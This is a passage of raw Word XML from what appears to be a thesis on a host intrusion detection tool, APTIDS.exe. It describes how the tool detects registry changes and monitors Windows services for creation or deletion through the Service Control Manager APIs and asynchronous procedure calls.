        <w:t>If cSubkeys == nSubkeys, RegQuery checks whether the name of the last subkey in chain match the name return in the previous query. If they do not match, a change has happened and RegQuery query the last subkey in chain which is the subkey has been changed. RegQuery also do that for key’s values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC0348" w:rsidRPr="00FC0348" w:rsidRDefault="00FC0348" w:rsidP="00FC0348">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Finally, if cSubkeys &lt; nSubkeys, a subkey was deleted. RegQuery do nothing in this case.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D5563" w:rsidRDefault="003D5563" w:rsidP="003D5563">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The following graphically demonstrates the mechanism for detecting changes in Registry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063A1C" w:rsidRDefault="00063A1C" w:rsidP="00063A1C">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4254E7BA" wp14:editId="649E0FF2">
            <wp:extent cx="5581650" cy="7451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1650" cy="7451090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B664D" w:rsidRPr="00E819FF" w:rsidRDefault="00063A1C" w:rsidP="00D5205D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc484886354"/>
      <w:r w:rsidRPr="00063A1C">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mechanism for detecting change in registry</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc484962999"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Service Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00672188">
        <w:t xml:space="preserve"> Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidR="00E2646F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E819FF" w:rsidRDefault="005250D5" w:rsidP="00E819FF">
      <w:r>
        <w:t xml:space="preserve">The primary purpose of malwares, whether their main tasks could be different, is to remain persistent in the compromised systems. </w:t>
      </w:r>
      <w:r w:rsidR="00730D2E">
        <w:t xml:space="preserve">There are lots of way to remain silently in systems without being easily detected as storing configuration in registry, creating a task in task scheduler, overwriting system files those start when system boots, etc. </w:t>
      </w:r>
      <w:r w:rsidR="00D5205D">
        <w:t xml:space="preserve">But what makes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D5205D">
        <w:t>really excited</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D5205D">
        <w:t xml:space="preserve"> is the Windows Service that stores service for programs those want to persistently run when system boots up, whether there is a user log</w:t>
      </w:r>
      <w:r w:rsidR="007D6443">
        <w:t>ged</w:t>
      </w:r>
      <w:r w:rsidR="00D5205D">
        <w:t xml:space="preserve"> in or not. </w:t>
      </w:r>
      <w:r w:rsidR="00D32ED3">
        <w:t xml:space="preserve">Furthermore, Windows Service also stores entries for device services, which means we can also detect rootkits in </w:t>
      </w:r>
      <w:r w:rsidR="00672188">
        <w:t>some viewpoints, those are running and store their boot-up information as device services. Since the concept of this thesis does not include rootkit detecting techniques, but when we monitor Windows Service, we can also capture and recognize some rootkits activities running in kernel mode based on device services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00672188" w:rsidRDefault="00672188" w:rsidP="00672188">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc484963000"/>
      <w:r>
        <w:t>Service Monitor Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="00672188" w:rsidRDefault="00EA4E51" w:rsidP="00672188">
      <w:r>
        <w:t>The Service Monitor Architecture is graphically demonstrated in the figure below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E646DE" w:rsidRDefault="007D52D3" w:rsidP="00E646DE">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="735DFC10" wp14:editId="1A21CF42">
            <wp:extent cx="5581650" cy="34023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1650" cy="3402330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA4E51" w:rsidRPr="00E646DE" w:rsidRDefault="00E646DE" w:rsidP="00E646DE">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc484886355"/>
      <w:r w:rsidRPr="00E646DE">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E646DE">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Monitor Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w:rsidR="00672188" w:rsidRPr="00672188" w:rsidRDefault="00CF22DD" w:rsidP="00672188">
      <w:r>
        <w:t>APTIDS.exe run in the background of operating systems, it creates an individual thread for calling “SvcChangeNotify”</w:t>
      </w:r>
      <w:r w:rsidR="00D90AA0">
        <w:t>, a function for monitoring and capture change in case there are both insertion or deletion of Windows Services entries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRPr="00D90AA0" w:rsidRDefault="00D90AA0" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc484963001"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Service Monitor Workflows</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0" w:rsidP="00D90AA0">
      <w:r>
        <w:t>SvcChangeNotify runs in background as an independent thread which performs real-time Service Monitor operations (as demonstrated in figure 3.3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>APTIDS.exe calls SvcChangeNotify as a separated thread for performing Windows Service change notification.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D90AA0" w:rsidRDefault="00D90AA0" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When startup, SvcChangeNotify must get a windows handle </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="-1785957948"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Mar09 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(21)</w:t>
          </w:r>
          <w:r w:rsidRPr="007D52D3">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> for the Service Control Manager (SCM), the handle then allows SvcChangeNotify</w:t>
      </w:r>
      <w:r w:rsidR="007D52D3">
        <w:t xml:space="preserve"> to create an access to SCM and monitor any activity occurs in the Services Database. For getting the handle, SvcChangeNotify call a Windows API named “OpenSCManager” and pass a special DWORD argument defined as “SC_MANAGER_ENUMERATE_SERVICE”. OpenSCManager now returns a handle that allow any Windows API using this handle can access and enumerate all Windows Service in SCM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D52D3" w:rsidRDefault="001D11AB" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SvcChangeNotify using this handle to calls “NotifyServiceStatusChange”, a windows API for notifying any change that SCM handle. SvcChangeNotify also specifies a Windows Event for NotifyServiceStatusCh</w:t>
      </w:r>
      <w:r w:rsidR="003813AA">
        <w:t>ange at which whenever an event</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> happened in SCM, that Windows Event will be set and used for capturing the occurring SCM event.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D11AB" w:rsidRDefault="001D11AB" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The Service Monitor Module now waiting for any SCM activities occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901234" w:rsidRDefault="001D11AB" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>When an SCM activity occurs, and since the concept is to capture any service that is deleted or inserted, the function “NotifyCallback” is call</w:t>
      </w:r>
      <w:r w:rsidR="00901234">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to check whether there </w:t>
      </w:r>
      <w:r w:rsidR="00901234">
        <w:t xml:space="preserve">is an inserted or deleted service. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D11AB" w:rsidRDefault="00901234" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bases on the activities occur to the service, NotifyCallback calls “WriteLog” for writing out service change logs and sends logs to distributed log collector hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4649" w:rsidRDefault="005C4649" w:rsidP="00D90AA0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After finish writing logs and sends log to server, WriteLog returns execution control to NotifyCallback, which then returns control to SvcChangeNotify and starts again from step 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC60B1" w:rsidRDefault="00DC60B1">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3F21BB" w:rsidRPr="003F21BB" w:rsidRDefault="003F21BB" w:rsidP="003F21BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc484963002"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NotifyServiceStatusChange</w:t>
      </w:r>
      <w:r w:rsidR="007D1D38">
        <w:t xml:space="preserve"> and Asynchronous Procedure Calls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="00130C5A" w:rsidRDefault="007D1D38" w:rsidP="003F21BB">
      <w:r>
        <w:t>NotifyServiceStatusChange is an essential API in the operations of Service Monitor Module. NotifyServiceStatusChange takes</w:t>
      </w:r>
      <w:r w:rsidR="00130C5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="-1875848606"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Mic4 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(22)</w:t>
          </w:r>
          <w:r w:rsidR="00130C5A" w:rsidRPr="00130C5A">
            <w:rPr>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00130C5A" w:rsidRPr="00130C5A" w:rsidRDefault="00130C5A" w:rsidP="00130C5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007D1D38">
        <w:t xml:space="preserve">he handle return by OpenSCManager </w:t>
      </w:r>
      <w:r>
        <w:t>as a handle for accessing the SCM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00130C5A" w:rsidRPr="00AC6309" w:rsidRDefault="00130C5A" w:rsidP="00130C5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>An object of the struct called “SERVICE_NOTIFY” which stores 2 important variables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC6309" w:rsidRPr="00AC6309" w:rsidRDefault="00AC6309" w:rsidP="00AC6309">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Pointer to a callback function to which the thread will execute in case there is any change happened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC6309" w:rsidRDefault="00AE511C" w:rsidP="00AE511C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>A context which can simply be explained as a user defined variable for the callback function.</w:t>
      </w:r>
      <w:r w:rsidR="00C56305">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> The context in this case stores an event handler which NotifyServiceStatusChange monitors for SCM event.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE511C" w:rsidRDefault="00C56305" w:rsidP="00AE511C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">The condition according to which NotifyServiceStatusChange performs action. This condition is a DWORD value which is defined by a XORed operation between two defined </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>integer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> as “SERVICE_NOTIFY_CREATED” and “SERVICE_NOTIFY_DELETED”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047AC7" w:rsidRDefault="003B53B6" w:rsidP="00047AC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">The event handler is passed to a Windows API called WaitForSingleObject to wait for any SCM event and return control to the callback function for further operations as described in section 3.3.2. </w:t>
      </w:r>
      <w:r w:rsidR="00047AC7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>NotifyServiceStatusChange not only captures the events belong to application services, but also can capture the device services which helps us in detecting rootkits’ behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D26AF5" w:rsidRDefault="000B5B0F" w:rsidP="00047AC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">When the service status changes, the system invokes the specified callback as an Asynchronous Procedure Call (APC) queued to the calling thread. </w:t>
      </w:r>
      <w:r w:rsidR="009729D4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">An APC is a function executing asynchronously in the context of a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009729D4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>particular thread</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009729D4">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D26AF5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">When an APC is queued to a thread, the system issues a software interrupt. The next time the thread is scheduled, it will run the APC function </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:vertAlign w:val="superscript"/>
          </w:rPr>
          <w:id w:val="-1363514047"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Mic5 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:noProof/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:t>(23)</w:t>
          </w:r>
          <w:r w:rsidR="00094EB9" w:rsidRPr="00DC60B1">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
              <w:vertAlign w:val="superscript"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00D26AF5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00576CC6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Each thread has its own APC queue. An APC function called “queued to a thread” is a function that added to that thread’s queue. The queuing of an APC function is a request for the thread to call that APC function next time the thread is scheduled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00047AC7" w:rsidRDefault="00D26AF5" w:rsidP="00047AC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>In this case, SvcChangeNotify is an independent thread that is executed by APTIDS.exe. SvcChangeNotify now calls NotifyServiceStatusChange for query the changes in SCM. When captures an SCM activities (such as service request on creating service), NotifyServiceStatusChange call the callback function (NotifyCallback)</w:t>
      </w:r>
      <w:r w:rsidR="00094EB9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
